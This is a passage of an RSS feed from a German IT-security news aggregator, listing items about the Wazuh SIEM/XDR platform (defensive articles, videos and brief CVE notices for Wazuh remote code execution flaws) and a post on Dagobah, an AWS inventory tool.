				<a href="https://store.blackhatethicalhacking.com/" target="_blank"><span class="et_pb_image_wrap "><img decoding="async" width="1080" height="1080" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch.png" alt="Merch" title="Merch" srcset="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch.png 1080w, https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-980x980.png 980w, https://www.blackhatethicalhacking.com/wp-content/uploads/2022/03/Merch-480x480.png 480w" sizes="(min-width: 0px) and (max-width: 480px) 480px, (min-width: 481px) and (max-width: 980px) 980px, (min-width: 981px) 1080px, 100vw" class="wp-image-261087"></span></a>
			</div>
			</div>
				
				
				
				
			</div>
			</div><div class="et_pb_column et_pb_column_1_4 et_pb_column_5    et_pb_css_mix_blend_mode_passthrough">
				
				
				
				
				<div class="et_pb_module et_pb_sidebar_4 news-sidebar1 et_pb_widget_area clearfix et_pb_widget_area_left et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget rpwe_widget recent-posts-extended"><h4 class="widgettitle">Recent News</h4><div class="rpwe-block news-recent-posts-sb"><ul class="rpwe-ul"><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/billion-devices-at-risk-two-buffer-overflow-flaws-found-in-tpm-2-0-specification/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Images-for-the-News-posts-4-300x150.png" alt="Billion Devices at Risk: Two Buffer Overflow Flaws Found in TPM 2.0 Specification" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/billion-devices-at-risk-two-buffer-overflow-flaws-found-in-tpm-2-0-specification/" target="_self">Billion Devices at Risk: Two Buffer Overflow Flaws Found in TPM 2.0 Specification</a></h3><time class="rpwe-time published" datetime="2023-03-06T10:25:57+02:00">March 6, 2023</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/critical-security-vulnerability-discovered-in-cisco-ip-phones/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Images-for-the-News-posts-2-300x150.png" alt="Critical Security Vulnerability Discovered in Cisco IP Phones" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/critical-security-vulnerability-discovered-in-cisco-ip-phones/" target="_self">Critical Security Vulnerability Discovered in Cisco IP Phones</a></h3><time class="rpwe-time published" datetime="2023-03-02T10:34:06+02:00">March 2, 2023</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/crypto-companies-under-attack-new-campaign-delivers-parallax-rat-malware/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Images-for-the-News-posts-1-300x150.png" alt="Crypto Companies Under Attack: New Campaign Delivers Parallax RAT Malware" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/crypto-companies-under-attack-new-campaign-delivers-parallax-rat-malware/" target="_self">Crypto Companies Under Attack: New Campaign Delivers Parallax RAT Malware</a></h3><time class="rpwe-time published" datetime="2023-03-01T10:55:10+02:00">March 1, 2023</time><div class="rpwe-summary"></div></li><li class="rpwe-li rpwe-clearfix"><a class="rpwe-img" href="https://www.blackhatethicalhacking.com/news/critical-vulnerabilities-discovered-in-popular-houzez-theme-and-plugin-for-wordpress/" target="_self"><img class="rpwe-aligncenter rpwe-thumb" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/02/Images-for-the-News-posts-9-300x150.png" alt="Critical vulnerabilities discovered in popular Houzez theme and plugin for WordPress" height="150" width="300" loading="lazy" decoding="async"></a><h3 class="rpwe-title"><a href="https://www.blackhatethicalhacking.com/news/critical-vulnerabilities-discovered-in-popular-houzez-theme-and-plugin-for-wordpress/" target="_self">Critical vulnerabilities discovered in popular Houzez theme and plugin for WordPress</a></h3><time class="rpwe-time published" datetime="2023-02-28T11:18:53+02:00">February 28, 2023</time><div class="rpwe-summary"></div></li></ul></div><!-- Generated by http://wordpress.org/plugins/recent-posts-widget-extended/ --></div><div class="widget_text et_pb_widget widget_custom_html"><div class="textwidget custom-html-widget"><!-- News Adsense Adcode --><ins class="adsbygoogle" data-ad-client="ca-pub-6620833063853657" data-ad-slot="8337846400" data-ad-format="auto" data-full-width-responsive="true"></ins> </div></div>
			</div><div class="et_pb_module et_pb_sidebar_5 news-sidebar2 et_animated et_pb_widget_area clearfix et_pb_widget_area_left  et_pb_text_align_justified et_pb_bg_layout_light">
				
				
				
				
				<div class="et_pb_widget widget_block"><a href="https://www.blackhatethicalhacking.com/courses/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2022/06/OffSec-Course.png"></a>
<h3>Offensive Security &amp; Ethical Hacking Course</h3>
<p>Begin the learning curve of hacking now!</p>
</div><div class="et_pb_widget widget_block"><hr><a href="https://www.blackhatethicalhacking.com/solutions/"><img decoding="async" src="https://www.blackhatethicalhacking.com/wp-content/uploads/2023/03/Solutions.png"></a>
<h3>Information Security Solutions</h3>
<p>Find out how Pentesting Services can help you.</p></div>
			</div>
			</div>
				</div>
				
			</div>The post <a href="https://www.blackhatethicalhacking.com/news/lucky-mouse-threat-group-launches-linux-malware-toolkit-called-sysupdate-for-targeted-attacks/">Lucky Mouse threat group launches Linux malware toolkit called SysUpdate for targeted attacks</a> first appeared on <a href="https://www.blackhatethicalhacking.com/">Black Hat Ethical Hacking</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[Auditing Kubernetes with Open Source SIEM and XDR]]></title>
<description><![CDATA[Container technology has gained traction among businesses due to the increased efficiency it provides. In this regard, organizations widely use Kubernetes for deploying, scaling, and managing containerized applications. Organizations should audit Kubernetes to ensure compliance with regulations, ...]]></description>
<link>https://tsecurity.de/de/1785467/it-security-nachrichten/auditing-kubernetes-with-open-source-siem-and-xdr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1785467/it-security-nachrichten/auditing-kubernetes-with-open-source-siem-and-xdr/</guid>
<pubDate>Wed, 08 Feb 2023 04:40:19 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Container technology has gained traction among businesses due to the increased efficiency it provides. In this regard, organizations widely use Kubernetes for deploying, scaling, and managing containerized applications. Organizations should audit Kubernetes to ensure compliance with regulations, find anomalies, and identify security risks. The Wazuh open source platform plays a critical role in]]></content:encoded>
</item>
<item>
<title><![CDATA[Ransomware detection with Wazuh SIEM and XDR platform]]></title>
<description><![CDATA[Wazuh is a free, open source SIEM/XDR solution with more than 10 million annual downloads. Learn more about how Wazuh can help protect your organization against the ever-evolving tactics of ransomware. [...]]]></description>
<link>https://tsecurity.de/de/1712371/it-security-nachrichten/ransomware-detection-with-wazuh-siem-and-xdr-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1712371/it-security-nachrichten/ransomware-detection-with-wazuh-siem-and-xdr-platform/</guid>
<pubDate>Tue, 29 Nov 2022 16:18:41 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh is a free, open source SIEM/XDR solution with more than 10 million annual downloads. Learn more about how Wazuh can help protect your organization against the ever-evolving tactics of ransomware. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat hunting with MITRE ATT&CK and Wazuh]]></title>
<description><![CDATA[Threat hunting is the process of looking for malicious activity and its artifacts in a computer system or network. Threat hunting is carried out intermittently in an environment regardless of whether or not threats have been discovered by automated security solutions. Some threat actors may stay ...]]></description>
<link>https://tsecurity.de/de/1699709/it-security-nachrichten/threat-hunting-with-mitre-attck-and-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1699709/it-security-nachrichten/threat-hunting-with-mitre-attck-and-wazuh/</guid>
<pubDate>Fri, 18 Nov 2022 14:32:58 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Threat hunting is the process of looking for malicious activity and its artifacts in a computer system or network. Threat hunting is carried out intermittently in an environment regardless of whether or not threats have been discovered by automated security solutions. Some threat actors may stay dormant in an organization's infrastructure, extending their access while waiting for the right]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-40497 | Wazuh up to 3.13.5/4.2.7/4.3.7 Active Response Endpoint Privilege Escalation]]></title>
<description><![CDATA[A vulnerability has been found in  Wazuh up to 3.13.5/4.2.7/4.3.7 and classified as critical. This vulnerability affects unknown code of the component Active Response Endpoint. The manipulation leads to Privilege Escalation.

This vulnerability was named CVE-2022-40497. The attack can be initiate...]]></description>
<link>https://tsecurity.de/de/1673708/sicherheitsluecken/cve-2022-40497-wazuh-up-to-3135427437-active-response-endpoint-privilege-escalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1673708/sicherheitsluecken/cve-2022-40497-wazuh-up-to-3135427437-active-response-endpoint-privilege-escalation/</guid>
<pubDate>Mon, 24 Oct 2022 18:05:04 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in  Wazuh up to 3.13.5/4.2.7/4.3.7 and classified as critical. This vulnerability affects unknown code of the component <em>Active Response Endpoint</em>. The manipulation leads to Privilege Escalation.

This vulnerability was named <a href="https://vuldb.com/?source_cve.209668">CVE-2022-40497</a>. The attack can be initiated remotely. There is no exploit available.

It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh - The free and open source XDR platform]]></title>
<description><![CDATA[Wazuh is a free and open source security platform that provides unified SIEM and XDR protection. It protects workloads across on-premises, virtualized, containerized, and cloud-based environments. Wazuh is one of the fastest growing open source security solutions, with over 10 million downloads p...]]></description>
<link>https://tsecurity.de/de/1645339/it-security-nachrichten/wazuh-the-free-and-open-source-xdr-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1645339/it-security-nachrichten/wazuh-the-free-and-open-source-xdr-platform/</guid>
<pubDate>Wed, 28 Sep 2022 18:03:20 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh is a free and open source security platform that provides unified SIEM and XDR protection. It protects workloads across on-premises, virtualized, containerized, and cloud-based environments. Wazuh is one of the fastest growing open source security solutions, with over 10 million downloads per year. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Improve your security posture with Wazuh, a free and open source XDR]]></title>
<description><![CDATA[Organizations struggle to find ways to keep a good security posture. This is because it is difficult to create secure system policies and find the right tools that help achieve a good posture. In many cases, organizations work with tools that do not integrate with each other and are expensive to ...]]></description>
<link>https://tsecurity.de/de/1645174/it-security-nachrichten/improve-your-security-posture-with-wazuh-a-free-and-open-source-xdr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1645174/it-security-nachrichten/improve-your-security-posture-with-wazuh-a-free-and-open-source-xdr/</guid>
<pubDate>Wed, 28 Sep 2022 15:33:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Organizations struggle to find ways to keep a good security posture. This is because it is difficult to create secure system policies and find the right tools that help achieve a good posture. In many cases, organizations work with tools that do not integrate with each other and are expensive to purchase and maintain.
Security posture management is a term used to describe the process of]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-40497]]></title>
<description><![CDATA[Wazuh v3.6.1 - v3.13.5, v4.0.0 - v4.2.7, and v4.3.0 - v4.3.7 were discovered to contain an authenticated remote code execution (RCE) vulnerability via the Active Response endpoint.]]></description>
<link>https://tsecurity.de/de/1644733/sicherheitsluecken/cve-2022-40497/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1644733/sicherheitsluecken/cve-2022-40497/</guid>
<pubDate>Wed, 28 Sep 2022 07:17:42 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh v3.6.1 - v3.13.5, v4.0.0 - v4.2.7, and v4.3.0 - v4.3.7 were discovered to contain an authenticated remote code execution (RCE) vulnerability via the Active Response endpoint.]]></content:encoded>
</item>
<item>
<title><![CDATA[AASLR: Active Response With Wazuh and OSSEC | Richard Fifarek]]></title>
<description><![CDATA[$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('8CoUFUDHfMk');
									});]]></description>
<link>https://tsecurity.de/de/1610572/it-security-video/aaslr-active-response-with-wazuh-and-ossec-richard-fifarek/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1610572/it-security-video/aaslr-active-response-with-wazuh-and-ossec-richard-fifarek/</guid>
<pubDate>Wed, 24 Aug 2022 17:33:52 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/8CoUFUDHfMk/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<div id="ytplayer_8CoUFUDHfMk"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('8CoUFUDHfMk');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | Sicherheits- und Incident-Management mit Wazuh​]]></title>
<description><![CDATA[Das Open-Source-Tool Wazuh hilft dem Admin bei der Bestandsaufnahme. Damit kann er Sicherheitslücken und Angriffe aufdecken und zügig Gegenmaßnahmen einleiten.]]></description>
<link>https://tsecurity.de/de/1601623/it-nachrichten/heise-sicherheits-und-incident-management-mit-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1601623/it-nachrichten/heise-sicherheits-und-incident-management-mit-wazuh/</guid>
<pubDate>Mon, 15 Aug 2022 14:17:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Open-Source-Tool Wazuh hilft dem Admin bei der Bestandsaufnahme. Damit kann er Sicherheitslücken und Angriffe aufdecken und zügig Gegenmaßnahmen einleiten.]]></content:encoded>
</item>
<item>
<title><![CDATA[heise+ | Sicherheits- und Incident-Management mit Wazuh​]]></title>
<description><![CDATA[Das Open-Source-Tool Wazuh hilft dem Admin bei der Bestandsaufnahme. Damit kann er Sicherheitslücken und Angriffe aufdecken und zügig Gegenmaßnahmen einleiten.]]></description>
<link>https://tsecurity.de/de/1601624/it-nachrichten/heise-sicherheits-und-incident-management-mit-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1601624/it-nachrichten/heise-sicherheits-und-incident-management-mit-wazuh/</guid>
<pubDate>Mon, 15 Aug 2022 14:17:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Open-Source-Tool Wazuh hilft dem Admin bei der Bestandsaufnahme. Damit kann er Sicherheitslücken und Angriffe aufdecken und zügig Gegenmaßnahmen einleiten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheits- und Incident-Management mit Wazuh​ | heise online]]></title>
<description><![CDATA[SIEM-Systeme (Security Incident and Event Management) kümmern sich hauptsächlich um die Erkennung, ... Das digitale Abo für IT und Technik.]]></description>
<link>https://tsecurity.de/de/1601584/it-security-nachrichten/sicherheits-und-incident-management-mit-wazuh-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1601584/it-security-nachrichten/sicherheits-und-incident-management-mit-wazuh-heise-online/</guid>
<pubDate>Mon, 15 Aug 2022 14:16:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SIEM-Systeme (<b>Security</b> Incident and Event Management) kümmern sich hauptsächlich um die Erkennung, ... Das digitale Abo für <b>IT</b> und Technik.]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat Detection & Active Response With Wazuh]]></title>
<description><![CDATA[$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('vJZAVZOIpfA');
									});]]></description>
<link>https://tsecurity.de/de/1530569/it-security-video/threat-detection-active-response-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1530569/it-security-video/threat-detection-active-response-with-wazuh/</guid>
<pubDate>Sat, 04 Jun 2022 18:34:35 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/vJZAVZOIpfA/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<div id="ytplayer_vJZAVZOIpfA"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('vJZAVZOIpfA');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[Installing & Configuring Wazuh]]></title>
<description><![CDATA[$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('SCG0wYGS-Mg');
									});]]></description>
<link>https://tsecurity.de/de/1530571/it-security-video/installing-configuring-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1530571/it-security-video/installing-configuring-wazuh/</guid>
<pubDate>Sat, 04 Jun 2022 18:34:35 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/SCG0wYGS-Mg/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<div id="ytplayer_SCG0wYGS-Mg"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('SCG0wYGS-Mg');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[Introduction To Wazuh SIEM]]></title>
<description><![CDATA[$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('Hq58_yGJwHk');
									});]]></description>
<link>https://tsecurity.de/de/1530572/it-security-video/introduction-to-wazuh-siem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1530572/it-security-video/introduction-to-wazuh-siem/</guid>
<pubDate>Sat, 04 Jun 2022 18:34:35 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/Hq58_yGJwHk/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<div id="ytplayer_Hq58_yGJwHk"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('Hq58_yGJwHk');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[Integrating Suricata With Wazuh For Log Processing]]></title>
<description><![CDATA[$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('NB_u9m-MMcY');
									});]]></description>
<link>https://tsecurity.de/de/1530553/it-security-video/integrating-suricata-with-wazuh-for-log-processing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1530553/it-security-video/integrating-suricata-with-wazuh-for-log-processing/</guid>
<pubDate>Sat, 04 Jun 2022 18:34:34 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<enclosure url="https://i.ytimg.com/vi/NB_u9m-MMcY/maxresdefault.jpg" length="0" type="image/jpeg" />
<content:encoded><![CDATA[<div id="ytplayer_NB_u9m-MMcY"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('NB_u9m-MMcY');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh 4.0.0/4.0.1/4.0.2/4.0.3 API /manager/files input validation]]></title>
<description><![CDATA[A vulnerability was found in Wazuh 4.0.0/4.0.1/4.0.2/4.0.3. It has been declared as critical. This vulnerability affects an unknown code of the file /manager/files of the component API. Upgrading to version 4.0.4 eliminates this vulnerability. The upgrade is hosted for download at github.com.]]></description>
<link>https://tsecurity.de/de/1423205/sicherheitsluecken/wazuh-400401402403-api-managerfiles-input-validation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1423205/sicherheitsluecken/wazuh-400401402403-api-managerfiles-input-validation/</guid>
<pubDate>Sun, 28 Mar 2021 20:31:22 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.wazuh">Wazuh 4.0.0/4.0.1/4.0.2/4.0.3</a>. It has been declared as critical. This vulnerability affects an unknown code of the file <em>/manager/files</em> of the component <em>API</em>. Upgrading to version 4.0.4 eliminates this vulnerability. The upgrade is hosted for download at <a href="https://vuldb.com/?countermeasure_upgrade_url.170818">github.com</a>.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-26814]]></title>
<description><![CDATA[Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service...]]></description>
<link>https://tsecurity.de/de/1400655/sicherheitsluecken/cve-2021-26814/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1400655/sicherheitsluecken/cve-2021-26814/</guid>
<pubDate>Sat, 06 Mar 2021 07:31:07 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wazuh API in Wazuh from 4.0.0 to 4.0.3 allows authenticated users to execute arbitrary code with administrative privileges via /manager/files URI. An authenticated user to the service may exploit incomplete input validation on the /manager/files API to inject arbitrary code within the API service script.]]></content:encoded>
</item>
<item>
<title><![CDATA[DAGOBAH - Open Source Tool To Generate Internal Threat Intelligence, Inventory & Compliance Data From AWS Resources]]></title>
<description><![CDATA[Dagobah is an open source tool written in python to automate the internal threat intelligence generation, inventory collection and compliance check from different AWS resources. Dagobah collects information and save the state into an elasticsearch index.Dagobah runs into the a LAMBDA and looks at...]]></description>
<link>https://tsecurity.de/de/1209436/it-security-nachrichten/dagobah-open-source-tool-to-generate-internal-threat-intelligence-inventory-compliance-data-from-aws-resources/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1209436/it-security-nachrichten/dagobah-open-source-tool-to-generate-internal-threat-intelligence-inventory-compliance-data-from-aws-resources/</guid>
<pubDate>Fri, 14 Aug 2020 15:01:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://1.bp.blogspot.com/-GdzO-ysd1Gg/XzNaLwvDK1I/AAAAAAAATZo/DgNJnzQIUfI-o8LCtA2tB_5fpWmEetbrACNcBGAsYHQ/s1600/dagobah_1_dagobah-dashboard.png" imageanchor="1"><img border="0" data-original-height="732" data-original-width="1600" height="292" src="https://1.bp.blogspot.com/-GdzO-ysd1Gg/XzNaLwvDK1I/AAAAAAAATZo/DgNJnzQIUfI-o8LCtA2tB_5fpWmEetbrACNcBGAsYHQ/s640/dagobah_1_dagobah-dashboard.png" width="640"></a></div><br>Dagobah is an open source tool written in python to automate the internal <a href="https://www.kitploit.com/search/label/Threat%20Intelligence" target="_blank" title="threat intelligence">threat intelligence</a> generation, inventory collection and compliance check from different AWS resources. Dagobah collects information and save the state into an <a href="https://www.kitploit.com/search/label/Elasticsearch" target="_blank" title="elasticsearch">elasticsearch</a> index.<br>Dagobah runs into the a LAMBDA and looks at all the AWS REGIONS, actually collect differents configurations from:<br><ul><li>EC2</li><li>VPC</li><li>ENI</li><li>SecurityGroups</li></ul><a name="more"></a><br><span><b>DAGOBAH GOAL:</b></span><br><ul><li>Add IOC and store them into elasticsearch/s3.</li><li>Live centralized inventory/config information related to AWS/NON-AWS resources.</li><li>Automatically evaluate resources against other platforms/analyzers.</li></ul><br><span><b>AWS services/resources:</b></span><br><ul><li>VPC</li><li>EC2</li><li>ENI</li><li>Security Groups</li></ul><br><span><b>Non-AWS resources:</b></span><br><ul><li>WAZUH (comming soon)</li></ul><br><span><b>Code layout:</b></span><br><div><pre><code>./<br> |- dagobah.py (main control for manual/automated exec)<br> |- modules/<br>             |- collector.py (query collection objects)<br>             |- iam_aws.py (iam stuff for aws multi account-role)<br>             |- setup.py (elk setup)<br>             |- analizer.py (analyzer for add external info to the collector)</code></pre></div><br><span><b>How works:</b></span><br><br><div class="separator"><a href="https://1.bp.blogspot.com/-7jdcOXuh0K8/XzNaTCu6ZZI/AAAAAAAATZs/f32DZi3LP8EIyO7y1tHMbQgGoOzKyQxqACNcBGAsYHQ/s1600/dagobah_2_deployment.png" imageanchor="1"><img border="0" data-original-height="776" data-original-width="938" height="528" src="https://1.bp.blogspot.com/-7jdcOXuh0K8/XzNaTCu6ZZI/AAAAAAAATZs/f32DZi3LP8EIyO7y1tHMbQgGoOzKyQxqACNcBGAsYHQ/s640/dagobah_2_deployment.png" width="640"></a></div><br>Ideally a Cloudwatch event is triggered the lambda every XXX with the account, role, and inventory type (all) to collect. The lambda gets the cloudwatch and iterates the accounts/role/inventory to start querying the AWS EC2 API with boto3 (not extra charges for use) and for different resources, an additional <a href="https://www.kitploit.com/search/label/Analyzer" target="_blank" title="analyzer">analyzer</a> is triggered to get context information like:<br><ul><li>wazuh information (comming soon)</li><li>running time EC2</li><li>security group rule status (open/closed)  Each result is stored in the inventory index of elasticsearch.</li></ul><br><span><b>Future integrations:</b></span><br><ul><li>lambda functions</li><li>aws elb/nlb</li><li>dns route53</li><li>iam / trustadvisor</li><li>s3 buckets</li><li>eks/fargate</li><li>transit-gateways</li><li>api gateway</li></ul><br><br><div><b><span><a class="kiploit-download" href="https://github.com/Stuxend/dagobah" rel="nofollow" target="_blank" title="Download Dagobah">Download Dagobah</a></span></b></div><img src="http://feeds.feedburner.com/~r/PentestTools/~4/heCluXrDIA0" height="1" width="1" alt="">]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,14ms -->